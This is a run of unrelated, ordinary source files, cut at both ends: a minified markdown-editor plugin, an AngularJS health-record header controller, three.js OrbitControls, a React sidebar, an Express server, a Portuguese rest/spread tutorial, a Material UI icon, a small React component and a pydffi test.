h,m,g,v=e.getConverter().hooks,x=$("#wmd-input"+t);v.chain("preConversion",function(e){var t=(e.match(/%/g)||[]).length,n=x[0].value||"";return h=new Array(t+2).join("%"),m=[],r(e,n,h,i,m)}),v.chain("postConversion",function(e){return e.replace(new RegExp(h+i+"-(\\d+)%","g"),function(e,t){return"<sup><a href='#' class='edit-"+i+"' data-id='"+t+"'>"+u+"</a></sup>"})});var b="The "+i+" editor does not support touch devices.",k=!1;$("#wmd-preview"+t).on("touchend",function(){k=!0}).on("click","a.edit-"+i,function(){return k?(alert(b),k=!1,!1):(k=!1,(!p||p())&&f(m[$(this).attr("data-id")]),!1)}),$("#wmd-input"+t).keyup(function(e){e.shiftKey||e.altKey||e.metaKey||!e.ctrlKey||77!==e.which||(!p||p())&&f()}),setTimeout(function(){var e=($("#wmd-button-bar"+t),$("#wmd-image-button"+t)),n=parseInt(e.css("left"));e.nextAll("li").each(function(){var e=$(this),t=parseInt(e.css("left"));e.prop("style").right||e.css("left",t+25)});var r=$("<li class='wmd-button wmd-"+i+"-button' style='left:"+(n+25)+"px' id='wmd-"+i+"-button"+t+"' title='"+s+" Ctrl-M' />").insertAfter(e),a=!1,o=$("<span />").css({"backgroundImage":"url("+l+")"}).appendTo(r).on("touchend",function(){a=!0}).click(function(){return a?(alert(b),a=!1,void 0):(a=!1,(!p||p())&&f(),void 0)});$.browser.msie&&o.mousedown(function(){g=x.caret()})},0)}function n(e){return('\n\n<!-- Begin {THING}: In order to preserve an editable {THING}, please\n don\'t edit this section directly.\n Click the "edit" link below the image in the preview instead. -->\n\n![{THING}]('+e+")\n\n<!-- End {THING} -->\n\n").replace(/{THING}/g,i)}var i=e.thingName,r=e.thingFinder,a=e.getIframeUrl,o=e.getDivContent,s=e.buttonTooltip,l=e.buttonImageUrl,c=e.onShow,d=e.onRemove||function(){},u=e.editLabel||"edit the above "+i,p=e.checkSupport;StackExchange.MarkdownEditor.creationCallbacks.add(t)}return{"init":e}}();
'use strict'; angular.module('rippleDemonstrator') .controller('headerController', function ($scope, $rootScope, $window, $state, usSpinnerService, $stateParams, UserService, AdvancedSearch) { $rootScope.searchExpression = ''; $scope.searchExpression = $rootScope.searchExpression; $scope.reportTypes = []; $scope.searchFocused = false; var redirectUrl; // Get current user UserService.findCurrentUser().then( function (response) { redirectUrl = response.headers().location; if (redirectUrl) { $window.location = redirectUrl; } else { $rootScope.currentUser = response.data; $scope.autoAdvancedSearch = false; // Direct different roles to different pages at login switch ($scope.currentUser.role) { case 'IDCR': $state.go('main-search'); break; case 'PHR': $state.go('patients-summary', { patientId: $rootScope.currentUser.nhsNumber }); break; default: $state.go('patients-summary', { patientId: $rootScope.currentUser.nhsNumber }); } } }); $scope.logout = function () { UserService.logout().then(function (response) { redirectUrl = response.headers().location; if (redirectUrl) { $window.location = redirectUrl; } }); }; $rootScope.$on('$stateChangeSuccess', function (event, toState) { var params = $stateParams; var previousState = ''; var pageHeader = ''; var previousPage = ''; var mainWidth = 0; var detailWidth = 0; switch (toState.name) { case 'main-search': previousState = ''; pageHeader = 'Welcome'; previousPage = ''; mainWidth = 12; detailWidth = 0; break; case 'patients-list': previousState = 'patients-charts'; pageHeader = 'Patient Lists'; previousPage = 'Patient Dashboard'; mainWidth = 12; detailWidth = 0; break; case 'patients-charts': previousState = ''; pageHeader = 'Patient Dashboard'; previousPage = ''; mainWidth = 12; detailWidth = 0; break; case 'patients-summary': previousState = 'patients-list'; pageHeader = 'Patient Summary'; previousPage = 'Patient Lists'; mainWidth = 12; detailWidth = 0; break; case 'patients-lookup': previousState = ''; pageHeader = 'Patients lookup'; previousPage = ''; mainWidth = 6; detailWidth = 6; break; case 'search-report': previousState = 'patients-charts'; pageHeader = 'Report Search'; previousPage = 'Patient Dashboard'; mainWidth = 12; detailWidth = 0; break; case 'patients-list-full': previousState = 'patients-charts'; pageHeader = 'Patients Details'; previousPage = 'Patient Dashboard'; mainWidth = 12; detailWidth = 0; break; default: previousState = 'patients-list'; pageHeader = 'Patients Details'; previousPage = 'Patient Lists'; mainWidth = 6; detailWidth = 6; break; } if (params.queryType === 'Reports: ') { previousState = 'search-report'; previousPage = 'Report Chart'; } $scope.containsReportString = function () { return $scope.searchExpression.indexOf('rp ') === 0; }; $scope.containsSettingString = function () { return $scope.searchExpression.lastIndexOf('st ') === 0; }; $scope.containsPatientString = function () { return $scope.searchExpression.lastIndexOf('pt ') === 0; }; $scope.containsReportTypeString = function () { for (var i = 0; i < $scope.reportTypes.length; i++) { if ($scope.searchExpression.lastIndexOf($scope.reportTypes[i]) !== -1) { return true; } } return false; }; $rootScope.searchMode = false; $rootScope.reportMode = false; $rootScope.settingsMode = false; $rootScope.patientMode = false; $rootScope.reportTypeSet = false; $rootScope.reportTypeString = ''; $scope.checkExpression = function () { if($scope.autoAdvancedSearch) { if($scope.searchExpression.length >= 3) { AdvancedSearch.openAdvancedSearch($scope.searchExpression); } } else if ($rootScope.searchMode) { if ($rootScope.reportMode && !$rootScope.reportTypeSet) { $scope.reportTypes = [ 'Diagnosis: ', 'Orders: ' ]; } if ($scope.containsReportTypeString() && !$scope.patientMode) { $rootScope.reportTypeSet = true; $scope.processReportTypeMode(); } } else { $scope.reportTypes = []; $rootScope.searchMode = ($scope.containsReportString() || $scope.containsSettingString() || $scope.containsPatientString()); $rootScope.reportMode = $scope.containsReportString(); $rootScope.settingsMode = $scope.containsSettingString(); $rootScope.patientMode = $scope.containsPatientString(); if ($rootScope.reportMode) { if ($scope.containsReportTypeString) { $scope.processReportTypeMode(); } $scope.processReportMode(); } if ($rootScope.settingsMode) { $scope.processSettingMode(); } if ($rootScope.patientMode) { $scope.processPatientMode(); } } }; $scope.cancelSearchMode = function () { $rootScope.reportMode = false; $rootScope.searchMode = false; $rootScope.patientMode = false; $rootScope.settingsMode = false; $scope.searchExpression = ''; $scope.reportTypes = ''; $rootScope.reportTypeSet = false; $rootScope.reportTypeString = ''; }; $scope.cancelReportType = function () { $rootScope.reportTypeString = ''; $rootScope.reportTypeSet = false; }; $scope.searchFunction = function () { if($scope.autoAdvancedSearch) { AdvancedSearch.openAdvancedSearch(); } if ($rootScope.reportTypeSet && $scope.searchExpression !== '') { var tempExpression = $rootScope.reportTypeString + ': ' + $scope.searchExpression; $state.go('search-report', { searchString: tempExpression }); } if ($rootScope.settingsMode && $scope.searchExpression !== '') { $state.go('patients-list-full', { queryType: 'Setting: ', searchString: $scope.searchExpression, orderType: 'ASC', pageNumber: '1' }); } if ($rootScope.patientMode && $scope.searchExpression !== '') { $state.go('patients-list-full', { queryType: 'Patient: ', searchString: $scope.searchExpression, orderType: 'ASC', pageNumber: '1' }); } }; $scope.processReportMode = function () { if ($scope.searchExpression === 'rp ') { $scope.searchExpression = ''; } }; $scope.processReportTypeMode = function () { for (var i = 0; i < $scope.reportTypes.length; i++) { if ($scope.searchExpression.lastIndexOf($scope.reportTypes[i]) !== -1) { var arr = $scope.searchExpression.split(':'); $rootScope.reportTypeString = arr[0]; $rootScope.reportTypeSet = true; $scope.searchExpression = ''; } } $scope.reportTypes = []; }; $scope.processSettingMode = function () { if ($scope.searchExpression === 'st ') { $scope.searchExpression = ''; } }; $scope.processPatientMode = function () { if ($scope.searchExpression === 'pt ') { $scope.searchExpression = ''; } }; if (typeof $stateParams.ageFrom === 'undefined') { previousState = 'patients-list'; previousPage = 'Patient Lists'; } $scope.pageHeader = pageHeader; $scope.previousState = previousState; $scope.previousPage = previousPage; $scope.mainWidth = mainWidth; $scope.detailWidth = detailWidth; $scope.searchBarEnabled = !$state.is('main-search'); $scope.goBack = function () { history.back(); }; $scope.userContextViewExists = ('user-context' in $state.current.views); $scope.actionsExists = ('actions' in $state.current.views); $scope.go = function (patient) { $state.go('patients-summary', { patientId: patient.id }); }; if ($scope.currentUser.role === 'PHR') { $scope.title = 'EHR4NI PHR' } else { $scope.title = 'EHR4NI' } $scope.footer = 'Integrated Digital Care Record'; $scope.goHome = function () { $scope.cancelSearchMode(); if ($scope.currentUser.role === 'IDCR') { $state.go('patients-charts'); } if ($scope.currentUser.role === 'PHR') { $state.go('patients-summary', { patientId: $scope.currentUser.nhsNumber }); } }; }); $scope.openAdvancedSearch = AdvancedSearch.openAdvancedSearch; $scope.$on("toggleHeaderSearchEnabled", function(event, enabled) { $scope.searchBarEnabled = enabled; }); $scope.$on("populateHeaderSearch", function(event, expression) { $scope.searchExpression = expression; $scope.searchFocused = true; }); });
/** * @author qiao / https://github.com/qiao * @author mrdoob / http://mrdoob.com * @author alteredq / http://alteredqualia.com/ * @author WestLangley / http://github.com/WestLangley * @author erich666 / http://erichaines.com */ /*global THREE, console */ // This set of controls performs orbiting, dollying (zooming), and panning. It maintains // the "up" direction as +Y, unlike the TrackballControls. Touch on tablet and phones is // supported. // // Orbit - left mouse / touch: one finger move // Zoom - middle mouse, or mousewheel / touch: two finger spread or squish // Pan - right mouse, or arrow keys / touch: three finter swipe // // This is a drop-in replacement for (most) TrackballControls used in examples. // That is, include this js file and wherever you see: // controls = new THREE.TrackballControls( camera ); // controls.target.z = 150; // Simple substitute "OrbitControls" and the control should work as-is. THREE.OrbitControls = function ( object, domElement ) { this.object = object; this.domElement = ( domElement !== undefined ) ? domElement : document; // API // Set to false to disable this control this.enabled = true; // "target" sets the location of focus, where the control orbits around // and where it pans with respect to. this.target = new THREE.Vector3(); // center is old, deprecated; use "target" instead this.center = this.target; // This option actually enables dollying in and out; left as "zoom" for // backwards compatibility this.noZoom = false; this.zoomSpeed = 1.0; // Limits to how far you can dolly in and out this.minDistance = 0; this.maxDistance = Infinity; // Set to true to disable this control this.noRotate = false; this.rotateSpeed = 1.0; // Set to true to disable this control this.noPan = false; this.keyPanSpeed = 7.0; // pixels moved per arrow key push // Set to true to automatically rotate around the target this.autoRotate = false; this.autoRotateSpeed = 2.0; // 30 seconds per round when fps is 60 // How far you can orbit vertically, upper and lower limits. // Range is 0 to Math.PI radians. this.minPolarAngle = 0; // radians this.maxPolarAngle = Math.PI; // radians // Set to true to disable use of the keys this.noKeys = false; // The four arrow keys this.keys = { LEFT: 37, UP: 38, RIGHT: 39, BOTTOM: 40 }; //////////// // internals var scope = this; var EPS = 0.000001; var rotateStart = new THREE.Vector2(); var rotateEnd = new THREE.Vector2(); var rotateDelta = new THREE.Vector2(); var panStart = new THREE.Vector2(); var panEnd = new THREE.Vector2(); var panDelta = new THREE.Vector2(); var dollyStart = new THREE.Vector2(); var dollyEnd = new THREE.Vector2(); var dollyDelta = new THREE.Vector2(); var phiDelta = 0; var thetaDelta = 0; var scale = 1; var pan = new THREE.Vector3(); var lastPosition = new THREE.Vector3(); var STATE = { NONE : -1, ROTATE : 0, DOLLY : 1, PAN : 2, TOUCH_ROTATE : 3, TOUCH_DOLLY : 4, TOUCH_PAN : 5 }; var state = STATE.NONE; // events var changeEvent = { type: 'change' }; this.rotateLeft = function ( angle ) { if ( angle === undefined ) { angle = getAutoRotationAngle(); } thetaDelta -= angle; }; this.rotateUp = function ( angle ) { if ( angle === undefined ) { angle = getAutoRotationAngle(); } phiDelta -= angle; }; // pass in distance in world space to move left this.panLeft = function ( distance ) { var panOffset = new THREE.Vector3(); var te = this.object.matrix.elements; // get X column of matrix panOffset.set( te[0], te[1], te[2] ); panOffset.multiplyScalar(-distance); pan.add( panOffset ); }; // pass in distance in world space to move up this.panUp = function ( distance ) { var panOffset = new THREE.Vector3(); var te = this.object.matrix.elements; // get Y column of matrix panOffset.set( te[4], te[5], te[6] ); panOffset.multiplyScalar(distance); pan.add( panOffset ); }; // main entry point; pass in Vector2 of change desired in pixel space, // right and down are positive this.pan = function ( delta ) { var element = scope.domElement === document ? scope.domElement.body : scope.domElement; if ( scope.object.fov !== undefined ) { // perspective var position = scope.object.position; var offset = position.clone().sub( scope.target ); var targetDistance = offset.length(); // half of the fov is center to top of screen targetDistance *= Math.tan( (scope.object.fov/2) * Math.PI / 180.0 ); // we actually don't use screenWidth, since perspective camera is fixed to screen height scope.panLeft( 2 * delta.x * targetDistance / element.clientHeight ); scope.panUp( 2 * delta.y * targetDistance / element.clientHeight ); } else if ( scope.object.top !== undefined ) { // orthographic scope.panLeft( delta.x * (scope.object.right - scope.object.left) / element.clientWidth ); scope.panUp( delta.y * (scope.object.top - scope.object.bottom) / element.clientHeight ); } else { // camera neither orthographic or perspective - warn user console.warn( 'WARNING: OrbitControls.js encountered an unknown camera type - pan disabled.' ); } }; this.dollyIn = function ( dollyScale ) { if ( dollyScale === undefined ) { dollyScale = getZoomScale(); } scale /= dollyScale; }; this.dollyOut = function ( dollyScale ) { if ( dollyScale === undefined ) { dollyScale = getZoomScale(); } scale *= dollyScale; }; this.update = function () { var position = this.object.position; var offset = position.clone().sub( this.target ); // angle from z-axis around y-axis var theta = Math.atan2( offset.x, offset.z ); // angle from y-axis var phi = Math.atan2( Math.sqrt( offset.x * offset.x + offset.z * offset.z ), offset.y ); if ( this.autoRotate ) { this.rotateLeft( getAutoRotationAngle() ); } theta += thetaDelta; phi += phiDelta; // restrict phi to be between desired limits phi = Math.max( this.minPolarAngle, Math.min( this.maxPolarAngle, phi ) ); // restrict phi to be betwee EPS and PI-EPS phi = Math.max( EPS, Math.min( Math.PI - EPS, phi ) ); var radius = offset.length() * scale; // restrict radius to be between desired limits radius = Math.max( this.minDistance, Math.min( this.maxDistance, radius ) ); // move target to panned location this.target.add( pan ); offset.x = radius * Math.sin( phi ) * Math.sin( theta ); offset.y = radius * Math.cos( phi ); offset.z = radius * Math.sin( phi ) * Math.cos( theta ); position.copy( this.target ).add( offset ); this.object.lookAt( this.target ); thetaDelta = 0; phiDelta = 0; scale = 1; pan.set(0,0,0); if ( lastPosition.distanceTo( this.object.position ) > 0 ) { this.dispatchEvent( changeEvent ); lastPosition.copy( this.object.position ); } }; function getAutoRotationAngle() { return 2 * Math.PI / 60 / 60 * scope.autoRotateSpeed; } function getZoomScale() { return Math.pow( 0.95, scope.zoomSpeed ); } function onMouseDown( event ) { if ( scope.enabled === false ) { return; } event.preventDefault(); if ( event.button === 0 ) { if ( scope.noRotate === true ) { return; } state = STATE.ROTATE; rotateStart.set( event.clientX, event.clientY ); } else if ( event.button === 1 ) { if ( scope.noZoom === true ) { return; } state = STATE.DOLLY; dollyStart.set( event.clientX, event.clientY ); } else if ( event.button === 2 ) { if ( scope.noPan === true ) { return; } state = STATE.PAN; panStart.set( event.clientX, event.clientY ); } // Greggman fix: https://github.com/greggman/three.js/commit/fde9f9917d6d8381f06bf22cdff766029d1761be scope.domElement.addEventListener( 'mousemove', onMouseMove, false ); scope.domElement.addEventListener( 'mouseup', onMouseUp, false ); } function onMouseMove( event ) { if ( scope.enabled === false ) return; event.preventDefault(); var element = scope.domElement === document ? scope.domElement.body : scope.domElement; if ( state === STATE.ROTATE ) { if ( scope.noRotate === true ) return; rotateEnd.set( event.clientX, event.clientY ); rotateDelta.subVectors( rotateEnd, rotateStart ); // rotating across whole screen goes 360 degrees around scope.rotateLeft( 2 * Math.PI * rotateDelta.x / element.clientWidth * scope.rotateSpeed ); // rotating up and down along whole screen attempts to go 360, but limited to 180 scope.rotateUp( 2 * Math.PI * rotateDelta.y / element.clientHeight * scope.rotateSpeed ); rotateStart.copy( rotateEnd ); } else if ( state === STATE.DOLLY ) { if ( scope.noZoom === true ) return; dollyEnd.set( event.clientX, event.clientY ); dollyDelta.subVectors( dollyEnd, dollyStart ); if ( dollyDelta.y > 0 ) { scope.dollyIn(); } else { scope.dollyOut(); } dollyStart.copy( dollyEnd ); } else if ( state === STATE.PAN ) { if ( scope.noPan === true ) return; panEnd.set( event.clientX, event.clientY ); panDelta.subVectors( panEnd, panStart ); scope.pan( panDelta ); panStart.copy( panEnd ); } // Greggman fix: https://github.com/greggman/three.js/commit/fde9f9917d6d8381f06bf22cdff766029d1761be scope.update(); } function onMouseUp( /* event */ ) { if ( scope.enabled === false ) return; // Greggman fix: https://github.com/greggman/three.js/commit/fde9f9917d6d8381f06bf22cdff766029d1761be scope.domElement.removeEventListener( 'mousemove', onMouseMove, false ); scope.domElement.removeEventListener( 'mouseup', onMouseUp, false ); state = STATE.NONE; } function onMouseWheel( event ) { if ( scope.enabled === false || scope.noZoom === true ) return; var delta = 0; if ( event.wheelDelta ) { // WebKit / Opera / Explorer 9 delta = event.wheelDelta; } else if ( event.detail ) { // Firefox delta = - event.detail; } if ( delta > 0 ) { scope.dollyOut(); } else { scope.dollyIn(); } } function onKeyDown( event ) { if ( scope.enabled === false ) { return; } if ( scope.noKeys === true ) { return; } if ( scope.noPan === true ) { return; } // pan a pixel - I guess for precise positioning? // Greggman fix: https://github.com/greggman/three.js/commit/fde9f9917d6d8381f06bf22cdff766029d1761be var needUpdate = false; switch ( event.keyCode ) { case scope.keys.UP: scope.pan( new THREE.Vector2( 0, scope.keyPanSpeed ) ); needUpdate = true; break; case scope.keys.BOTTOM: scope.pan( new THREE.Vector2( 0, -scope.keyPanSpeed ) ); needUpdate = true; break; case scope.keys.LEFT: scope.pan( new THREE.Vector2( scope.keyPanSpeed, 0 ) ); needUpdate = true; break; case scope.keys.RIGHT: scope.pan( new THREE.Vector2( -scope.keyPanSpeed, 0 ) ); needUpdate = true; break; } // Greggman fix: https://github.com/greggman/three.js/commit/fde9f9917d6d8381f06bf22cdff766029d1761be if ( needUpdate ) { scope.update(); } } function touchstart( event ) { if ( scope.enabled === false ) { return; } switch ( event.touches.length ) { case 1: // one-fingered touch: rotate if ( scope.noRotate === true ) { return; } state = STATE.TOUCH_ROTATE; rotateStart.set( event.touches[ 0 ].pageX, event.touches[ 0 ].pageY ); break; case 2: // two-fingered touch: dolly if ( scope.noZoom === true ) { return; } state = STATE.TOUCH_DOLLY; var dx = event.touches[ 0 ].pageX - event.touches[ 1 ].pageX; var dy = event.touches[ 0 ].pageY - event.touches[ 1 ].pageY; var distance = Math.sqrt( dx * dx + dy * dy ); dollyStart.set( 0, distance ); break; case 3: // three-fingered touch: pan if ( scope.noPan === true ) { return; } state = STATE.TOUCH_PAN; panStart.set( event.touches[ 0 ].pageX, event.touches[ 0 ].pageY ); break; default: state = STATE.NONE; } } function touchmove( event ) { if ( scope.enabled === false ) { return; } event.preventDefault(); event.stopPropagation(); var element = scope.domElement === document ? scope.domElement.body : scope.domElement; switch ( event.touches.length ) { case 1: // one-fingered touch: rotate if ( scope.noRotate === true ) { return; } if ( state !== STATE.TOUCH_ROTATE ) { return; } rotateEnd.set( event.touches[ 0 ].pageX, event.touches[ 0 ].pageY ); rotateDelta.subVectors( rotateEnd, rotateStart ); // rotating across whole screen goes 360 degrees around scope.rotateLeft( 2 * Math.PI * rotateDelta.x / element.clientWidth * scope.rotateSpeed ); // rotating up and down along whole screen attempts to go 360, but limited to 180 scope.rotateUp( 2 * Math.PI * rotateDelta.y / element.clientHeight * scope.rotateSpeed ); rotateStart.copy( rotateEnd ); break; case 2: // two-fingered touch: dolly if ( scope.noZoom === true ) { return; } if ( state !== STATE.TOUCH_DOLLY ) { return; } var dx = event.touches[ 0 ].pageX - event.touches[ 1 ].pageX; var dy = event.touches[ 0 ].pageY - event.touches[ 1 ].pageY; var distance = Math.sqrt( dx * dx + dy * dy ); dollyEnd.set( 0, distance ); dollyDelta.subVectors( dollyEnd, dollyStart ); if ( dollyDelta.y > 0 ) { scope.dollyOut(); } else { scope.dollyIn(); } dollyStart.copy( dollyEnd ); break; case 3: // three-fingered touch: pan if ( scope.noPan === true ) { return; } if ( state !== STATE.TOUCH_PAN ) { return; } panEnd.set( event.touches[ 0 ].pageX, event.touches[ 0 ].pageY ); panDelta.subVectors( panEnd, panStart ); scope.pan( panDelta ); panStart.copy( panEnd ); break; default: state = STATE.NONE; } } function touchend( /* event */ ) { if ( scope.enabled === false ) { return; } state = STATE.NONE; } this.domElement.addEventListener( 'contextmenu', function ( event ) { event.preventDefault(); }, false ); this.domElement.addEventListener( 'mousedown', onMouseDown, false ); this.domElement.addEventListener( 'mousewheel', onMouseWheel, false ); this.domElement.addEventListener( 'DOMMouseScroll', onMouseWheel, false ); // firefox this.domElement.addEventListener( 'keydown', onKeyDown, false ); this.domElement.addEventListener( 'touchstart', touchstart, false ); this.domElement.addEventListener( 'touchend', touchend, false ); this.domElement.addEventListener( 'touchmove', touchmove, false ); }; THREE.OrbitControls.prototype = Object.create( THREE.EventDispatcher.prototype );
// Copyright (c) 2021 Uber Technologies, Inc. // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to deal // in the Software without restriction, including without limitation the rights // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell // copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN // THE SOFTWARE. import React, {Component} from 'react'; import PropTypes from 'prop-types'; import styled from 'styled-components'; import {ArrowRight} from 'components/common/icons'; const StyledSidePanelContainer = styled.div` z-index: 99; height: 100%; width: ${props => props.width + 2 * props.theme.sidePanel.margin.left}px; display: flex; transition: width 250ms; position: absolute; padding-top: ${props => props.theme.sidePanel.margin.top}px; padding-right: ${props => props.theme.sidePanel.margin.right}px; padding-bottom: ${props => props.theme.sidePanel.margin.bottom}px; padding-left: ${props => props.theme.sidePanel.margin.left}px; pointer-events: none; /* prevent padding from blocking input */ & > * { /* all children should allow input */ pointer-events: all; } `; const SideBarContainer = styled.div` box-shadow: 0 1px 3px rgba(0, 0, 0, 0.2); transition: left 250ms, right 250ms; left: ${props => props.left}px; align-items: stretch; flex-grow: 1; `; const SideBarInner = styled.div` background-color: ${props => props.theme.sidePanelBg}; border-radius: 1px; display: flex; flex-direction: column; height: 100%; border-left: ${props => props.theme.sidePanelBorder}px solid ${props => props.theme.sidePanelBorderColor}; `; const StyledCollapseButton = styled.div` align-items: center; box-shadow: 0 1px 3px rgba(0, 0, 0, 0.2); justify-content: center; background-color: ${props => props.theme.sideBarCloseBtnBgd}; border-radius: 1px; color: ${props => props.theme.sideBarCloseBtnColor}; display: flex; height: 20px; position: absolute; right: -8px; top: ${props => props.theme.sidePanel.margin.top}px; width: 20px; :hover { cursor: pointer; box-shadow: none; background-color: ${props => props.theme.sideBarCloseBtnBgdHover}; } `; export const CollapseButtonFactory = () => { const CollapseButton = ({onClick, isOpen}) => ( <StyledCollapseButton className="side-bar__close" onClick={onClick}> <ArrowRight height="12px" style={{transform: `rotate(${isOpen ? 180 : 0}deg)`}} /> </StyledCollapseButton> ); return CollapseButton; }; SidebarFactory.deps = [CollapseButtonFactory]; function SidebarFactory(CollapseButton) { return class SideBar extends Component { static propTypes = { width: PropTypes.number, isOpen: PropTypes.bool, minifiedWidth: PropTypes.number, onOpenOrClose: PropTypes.func }; static defaultProps = { width: 300, minifiedWidth: 0, isOpen: true, onOpenOrClose: function noop() {} }; _onOpenOrClose = () => { this.props.onOpenOrClose({isOpen: !this.props.isOpen}); }; render() { const {isOpen, minifiedWidth, width} = this.props; const horizontalOffset = isOpen ? 0 : minifiedWidth - width; return ( <StyledSidePanelContainer width={isOpen ? width : 0} className="side-panel--container"> <SideBarContainer className="side-bar" style={{width: `${width}px`}} left={horizontalOffset} > {isOpen ? ( <SideBarInner className="side-bar__inner">{this.props.children}</SideBarInner> ) : null} <CollapseButton isOpen={isOpen} onClick={this._onOpenOrClose} /> </SideBarContainer> </StyledSidePanelContainer> ); } }; } export default SidebarFactory;
// dependencies const express = require('express'); // creating express server const app = express(); // sets up initial port const PORT = process.env.PORT || 3001; // this sets up express for data parsing app.use(express.urlencoded({ extended: true })); app.use(express.json()); app.use(express.static('public')); // point server to route files require('./routes/apiRoutes')(app); require('./routes/htmlRoutes')(app); // listener code app.listen(PORT, () => { console.log(`App listening on PORT: ${PORT}`); });
/* vamos começar pelo REST < isso mesmo "-é o resto", o que sobra.. então, essa pratica se aplica com aqueles tres pontinho ali. isso é pra ser usado quando se tem 2 ou mais parametros, pois o primeiro parametro vira uma constante, em seguida tudo o RESTO vira um array. aki abaixo "origamid" é o parametro exclusivo e o resto vai pra um arrray chamado "clientes" isso se chama REST */ function showList (empresa, ...clientes){ console.log(empresa) console.log(clientes) } showList("Origamid", "jao", "maria") /* SPREAD - espalha .... na verdade, interpreta. quando há uma diferença de tipo de valores, tipo: Number != Text ou pra dizer quando vc precisa mexer com numeros e eles estão em um array que apresenta conflito de type... entao o SPREAD é uma 'tecla SAP' (desculpe o termo mas é pra ficar facil) funciona assim como segue abaixo: */ //let numeros = [1 ,3 , 39, 43, 38222] //console.log(Math.max(numeros)) //*Math.max é um operador matemático que trata numeros, porem 'numeros' é um array e isso pra 'math' é o fim da picada, pois ele nao é capaz de olhar os numeros la dentro, ele fala que é NaN .. o SPREAD é o decoder do array... let numeros = [1 ,3 , 39, 43, 38222] console.log(Math.max(...numeros)) //olha lá no console se nao tem por acaso o 38222 . então ja sabe né? problemas numericos desse tipo pedem SPREAD! //aqui em baixo vemos que uma lista de 'li' pode ser vista no console como parecido com array - o modo de seleção ajudou nisso const items = document.querySelectorAll("li") // console.log(items) //AKI ABAIXO os 'li' estão passando no console como elementos PARECIDOs de array items.forEach(item => { console.log(item) //forEach funciona bem com esse tipo de objeto (li), se for um outro metodo que por exemplo ŕocura criar um novo array ex. 'map'(mapear itens) ... daih nao daria. retornando erro. }) //eu posso também criar um array dos 'li' como abaixo : const coisas = document.querySelectorAll("li") //e abaixo uma outra forma de colocar itens dentro de um array //[...coisas].map(coisa =>{ // console.log(coisa) //}) //abaixo vamos ver uma clonagem de objeto com a funçao SPREAD const carro = {cor: "preto", ano: 2, taxa: 20000} const cloneCarro = {...carro} class Transporte { constructor(){ this.terrestre = true } andar(){ console.log('andou') } } class Carro extends Transporte { constructor(cor, portas){ super() this.cor = cor this.portas = portas } } const carrow = new Carro("vermelho", 4) const carroClonado = {...carrow} console.log(carrow) //aqui o objeto aparece completo com o atributo Carro console.log(carroClonado) //aki ..foram clonados em uma nova const apenas os elementos em array //no console, o prototipo carrow é tipo 'transporte' conforme declarado // ja o carroClonado ele tem prototipo 'object' - forma de diferenciar ambos! //a const carrow recebe parâmetros originais que podem se extender por níveis //a const carroClonado só recebe um array superficial de informações e ja não abrange por exempl, a funçao andar(), que é prototipa de Transporte
import React from 'react'; import createSvgIcon from './utils/createSvgIcon'; export default createSvgIcon(React.createElement(React.Fragment, null, React.createElement("path", { fill: "none", d: "M0 0h24v24H0z" }), React.createElement("path", { d: "M3.27 5L2 6.27l6.97 6.97L6.5 19h3l1.57-3.66L16.73 21 18 19.73 3.55 5.27 3.27 5zM6 5v.18L8.82 8h2.4l-.72 1.68 2.1 2.1L14.21 8H20V5H6z" })), 'FormatClear');
import React, { Component } from 'react'; export class InputLine extends Component { displayName = InputLine.name constructor(props) { super(props); var inputLineText = "0"; this.state = { inputLineText: inputLineText } this.get = this.get.bind(this); this.set = this.set.bind(this); InputLine._instance = this; } set(s) { this.setState({ inputLineText: s}); return s; } get(s) { return this.state.inputLineText; } render() { return ( <div className="inputline row"> {this.state.inputLineText} </div> ); } }
# Copyright 2018 Adrien Guinet <[email protected]> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # RUN: "%python" "%s" import pydffi import sys def check(CU, name): try: getattr(CU.funcs,name) sys.exit(1) except pydffi.UnknownFunctionError: pass D = pydffi.FFI() CU = D.compile(''' #include <stdio.h> #include <stdlib.h> __attribute__((noreturn)) void fatal(const char* err) { puts(err); exit(1); } ''') check(CU, "fatal") CU = D.cdef(''' __attribute__((noreturn)) void fatal(const char* err); ''') check(CU, "fatal")
(window.webpackJsonp=window.webpackJsonp||[]).push([["a8ec"],{"0Cba":function(c,e,t){"use strict";t.r(e),function(c){t.d(e,"ACTIVE",function(){return h}),t.d(e,"ALIGN_LEFT",function(){return o}),t.d(e,"ALIGN_RIGHT",function(){return i}),t.d(e,"DARK",function(){return v}),t.d(e,"DISABLED",function(){return z}),t.d(e,"FILL",function(){return m}),t.d(e,"FIXED",function(){return u}),t.d(e,"FIXED_TOP",function(){return f}),t.d(e,"INLINE",function(){return d}),t.d(e,"INTERACTIVE",function(){return M}),t.d(e,"LARGE",function(){return H}),t.d(e,"LOADING",function(){return V}),t.d(e,"MINIMAL",function(){return p}),t.d(e,"MULTILINE",function(){return C}),t.d(e,"ROUND",function(){return L}),t.d(e,"SMALL",function(){return g}),t.d(e,"VERTICAL",function(){return y}),t.d(e,"POSITION_TOP",function(){return A}),t.d(e,"POSITION_BOTTOM",function(){return b}),t.d(e,"POSITION_LEFT",function(){return S}),t.d(e,"POSITION_RIGHT",function(){return w}),t.d(e,"ELEVATION_0",function(){return E}),t.d(e,"ELEVATION_1",function(){return N}),t.d(e,"ELEVATION_2",function(){return O}),t.d(e,"ELEVATION_3",function(){return T}),t.d(e,"ELEVATION_4",function(){return x}),t.d(e,"INTENT_PRIMARY",function(){return 